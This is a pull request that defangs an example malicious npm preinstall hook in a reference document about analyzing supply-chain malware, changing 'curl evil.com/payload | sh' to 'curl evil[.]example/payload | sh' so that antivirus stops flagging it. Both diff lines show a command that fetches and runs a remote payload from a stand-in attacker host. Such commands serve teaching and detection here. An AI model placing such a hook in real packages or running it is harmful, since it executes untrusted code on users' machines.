### PR TITLE
fix: Defang malware example to prevent Windows Defender quarantine

### DIFF
--- a/skills/analyzing-supply-chain-malware-artifacts/references/api-reference.md
+++ b/skills/analyzing-supply-chain-malware-artifacts/references/api-reference.md
@@ -77,7 +77,7 @@ cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
 ```json
 {
   "scripts": {
-    "preinstall": "curl evil.com/payload | sh",
+    "preinstall": "curl evil[.]example/payload | sh",
     "postinstall": "node ./install.js",
     "preuninstall": "node cleanup.js"
   }


### PR DESCRIPTION
Closes #79

## Changes
- Replaced `evil.com` with `evil[.]example` in the npm install hook example
- Preserves the educational content while preventing AV signature matches
- Defanged domain no longer triggers Windows Defender quarantine

## Rationale
The brackets prevent shell execution while maintaining clarity that this is a malicious payload example.